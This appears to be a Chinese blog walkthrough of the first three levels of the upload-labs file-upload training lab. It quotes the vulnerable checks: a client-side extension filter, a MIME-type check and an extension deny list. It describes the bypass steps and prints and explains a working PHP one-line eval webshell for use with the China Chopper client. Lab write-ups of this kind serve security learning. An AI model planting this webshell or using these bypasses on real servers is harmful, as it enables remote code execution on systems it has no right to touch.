pass01
关键代码
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
只有后缀jpg png gif的文件才能上传
写一个webshell.php,后缀改为.jpg后上传 抓包
.jpg 改为php后发包
response中找到文件路径
或者post data手动测试下一句话木马
然后菜刀即可。
也可以在浏览器中测试
一句话木马原理
此外,因为设障碍只在前端,更改源代码也可
一句话木马原理: 0X02 webshell的原理 •<?php @eval($_POST['c']);?>
•@:抑制错误信息即使有错误也不返回•eval:把字符串 作为PHP代码执行。
•$_POST[‘c’]:POST接收一个c=xxxx的指令。c是可以自行更改的
•显然我们只要POST一个C=‘xxxx’的请求,xxx就是我们所想执行的PHP命令,这样我们就可以任意在服务器上执行我们想做的事情了example:c=phpinfo()
这显然就是执行phpinfo()这个函数。
下面的题只提供关键代码,关键步骤,即如何绕过,成功上传文件
pass02
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
属于绕过MIME类型检测
抓包后修改content-Type为image/jpeg即可
pass03
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
博主正在咕咕